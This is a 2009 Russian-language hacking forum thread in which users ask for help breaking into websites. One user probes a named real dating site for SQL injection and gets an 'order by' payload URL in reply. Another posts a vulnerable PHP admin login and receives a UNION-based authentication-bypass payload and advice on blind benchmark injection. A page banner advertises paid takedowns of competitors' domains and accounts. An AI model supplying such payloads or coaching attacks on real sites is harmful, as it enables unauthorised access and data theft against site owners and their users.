Ваши вопросы по уязвимостям.

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 736 из 2422

736

Опции темы

Поиск в этой теме

Опции просмотра

03.06.2009, 11:30

~~^YaHoo^~~

Banned

Регистрация: 02.01.2009

Сообщений: 29

С нами: 9133839

Репутация: 85

Зравсвуйте вот нашел сайтец http://unsleep.ru/browse.php?sex_male=1&sex_female=1&photo_only=1&on line_only=1&search=1&age_start=1'&age_end=1&countr y=1 помогите пожалуйста пытаюсь подобрать кол-во полей ни как ни могу перечитал все статьи по sql инъекциям.

𝕏 Twitter Reddit Telegram Копировать ссылку

03.06.2009, 11:45

j0ker13

Участник форума

Регистрация: 28.07.2008

Сообщений: 199

С нами: 9361870

Репутация: 58

2^YaHoo^
http://unsleep.ru/browse.php?sex_male=1&sex_female=1&photo_only=1&on line_only=1&search=1&age_start=1)))+order+by+1000+--+&age_end=1&country=1
дальше сам)

03.06.2009, 17:13

SeNaP

Участник форума

Регистрация: 07.08.2008

Сообщений: 281

С нами: 9347610

Репутация: 165

Всем привет, у меня такой вопрос, можно ли как нибудь попасть в админ панель.
Как я вижу, что авторизация проходит так: в БД ищется юзер с соответсвующем поролем из БД.
А дальше я понять не чего не могу

PHP код:


		
			




$login = $_GET['login'];

$pass = $_GET['p'];



$result = mysql_query("SELECT `pass` FROM `superadmin` WHERE `login`='$login';");

$row=mysql_fetch_row($result);

if(!empty($row))

{

 $truepass = $row[0];

 if ($truepass == $pass || $truepass == md5($pass))



 {

  // вход осуществлен

 else

 {

//неверный пароль

break;

 }



else

  {

  //неверный пароль

  }

помогите пожалуйсто разобраться

03.06.2009, 17:18

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

С нами: 9410786

Репутация: 2731

Уязвимый скрипт у тебя... SQL-инъекция там..

03.06.2009, 17:25

SeNaP

Участник форума

Регистрация: 07.08.2008

Сообщений: 281

С нами: 9347610

Репутация: 165

mailbrush,можеш носом меня тыкнуть, где там уязвимость и как ей воспользоватся?

03.06.2009, 17:33

Iceangel_

Постоянный

Регистрация: 09.07.2006

Сообщений: 553

С нами: 10441826

Репутация: 1861

2 SeNaP
уязвимый параметр login, крути как слепую, т.к. еще вывода нету, то придется заюзать бенчмарк

Последний раз редактировалось Iceangel_; 03.06.2009 в 17:38..

03.06.2009, 17:33

ElteRUS

Постоянный

Регистрация: 11.10.2007

Сообщений: 406

С нами: 9780227

Репутация: 1423

2 SeNaP

Там то, что вернет запрос (пароль) должно соответствовать тому, что в переменной p

При волшебных_кавычках = офф

login.php?login=-1'+union+select+123--+&p=123

Вроде так, если я не накосячил

03.06.2009, 18:56

SeNaP

Участник форума

Регистрация: 07.08.2008

Сообщений: 281

С нами: 9347610

Репутация: 165

Понял одно, что один уязвимый параметр это login

Последний раз редактировалось SeNaP; 03.06.2009 в 19:00..

03.06.2009, 19:37

~~farex~~

Banned

Регистрация: 11.03.2009

Сообщений: 214

С нами: 9035873

Репутация: 317

А чего те не понятно....
Товарищь Iceangel_ тебе же написал....

Цитата:

Iceangel_
уязвимый параметр login, крути как слепую, т.к. еще вывода нету, то придется заюзать бенчмарк

#10

03.06.2009, 19:51

SeNaP

Участник форума

Регистрация: 07.08.2008

Сообщений: 281

С нами: 9347610

Репутация: 165

Можете хотябы пример написать как крутить.... пожалуйсто

Последний раз редактировалось SeNaP; 03.06.2009 в 19:54..

Страница 736 из 2422

736

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules